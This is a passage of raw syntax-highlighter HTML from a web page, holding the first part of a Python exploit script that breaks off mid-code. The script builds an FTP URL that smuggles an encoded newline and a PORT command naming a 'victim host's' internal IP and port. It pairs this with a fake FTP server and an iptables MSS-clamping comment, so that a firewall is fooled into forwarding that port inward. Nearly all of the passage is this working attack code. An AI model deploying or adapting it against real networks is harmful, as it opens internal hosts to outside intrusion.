crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-122\">122<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-123\">123<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-124\">124<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-125\">125<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-126\">126<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-127\">127<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-128\">128<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-129\">129<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-130\">130<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-131\">131<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-132\">132<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-133\">133<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-134\">134<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-135\">135<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-136\">136<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-137\">137<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-138\">138<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-139\">139<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-140\">140<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-141\">141<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-142\">142<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-143\">143<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-144\">144<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-145\">145<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-146\">146<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-147\">147<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-148\">148<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-149\">149<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-150\">150<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-151\">151<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-152\">152<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-153\">153<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-154\">154<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-155\">155<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-156\">156<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-157\">157<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-158\">158<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-159\">159<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-160\">160<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-1\"><span class=\"crayon-p\">#!\/usr\/bin\/env python3<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-3\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-4\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">sys<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-5\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">os<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-6\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">time<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-7\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">random<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-8\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">argparse<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-9\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">binascii<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-10\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">traceback<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-11\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-t\">struct<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-12\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">socket<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-13\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">threading<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-14\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">subprocess<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-15\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">urllib<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-16\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">urllib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">parse<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-17\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-18\"><span class=\"crayon-v\">parser<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">argparse<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">ArgumentParser<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">description<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-19\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-20\"><span class=\"crayon-v\">parser<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">add_argument<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;public_ip&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">default<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">help<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;IP address the client can reach you at.&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-22\"><span class=\"crayon-v\">parser<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">add_argument<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;internal_ip&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">default<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">help<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;The victim host&#8217;s internal IP address.&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-24\"><span class=\"crayon-v\">parser<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">add_argument<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;target_port&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">default<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">help<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;TCP port you want to fool the firewall into forwarding. Must be in the range [1024..65535].&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-26\"><span class=\"crayon-v\">parser<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">add_argument<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;&#8211;port&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">default<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">help<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;TCP port to listen on (default: 21).&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-28\"><span class=\"crayon-v\">parser<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">add_argument<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;&#8211;ip&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dest<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;ip&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">str<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">default<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;0.0.0.0&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">help<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;Local IP address to listen on (default: 0.0.0.0).&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-30\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-31\"><span class=\"crayon-p\"># Run this first to clamp down the MSS:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-32\"><span class=\"crayon-p\"># iptables -A OUTPUT -p tcp &#8211;tcp-flags SYN,RST SYN &#8211;sport 21 -j TCPMSS &#8211;set-mss 536<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-33\"><span class=\"crayon-p\"># <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-34\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-35\"><span class=\"crayon-v\">options<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">parser<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">parse_args<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-36\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-37\"><span class=\"crayon-v\">QUIT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-38\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-39\"><span class=\"crayon-v\">NL<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;n&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-40\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-41\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">generateURL<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pad_len<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-42\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-m\">global<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">options<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-43\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-44\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">octets<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">options<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">internal_ip<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;.&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-45\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">octets<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">extend<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;%d&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">options<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">target_port<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">256<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-s\">&#8220;%d&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">options<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">target_port<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">256<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-47\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">port_cmd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;PORT%20&#8221;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;,&#8217;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">join<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">octets<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">padding<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;X&#8221;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-e\">pad_len<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-49\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">newline<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">urllib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">parse<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">quote<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">NL<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-50\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">url_template<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;ftp:\/\/x:y@%s\/leet%s%s%s\/z.txt&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-51\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-52\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">url_template<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">options<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">public_ip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">padding<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">newline<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">port_cmd<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-53\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-54\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-55\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">ftpSession<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">clientSock<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">stream_id<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-56\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">clientSock<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sendall<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">b<\/span><span class=\"crayon-s\">&#8216;220 Port Opener Expressrn&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">next_command<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-58\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">while<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">QUIT<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-59\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">command<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-60\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">next_command<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-61\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">command<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">next_command<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-62\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">next_command<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-63\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">while<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">command<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-66\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">command<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">clientSock<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">recv<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">536<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">socket<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">MSG_DONTWAIT<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-67\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">except <\/span><span class=\"crayon-e\">BlockingIOError <\/span><span class=\"crayon-st\">as<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-68\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">pass<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-69\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">stderr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&gt;&gt; %s&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">command<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">decode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;utf-8&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-70\"><span 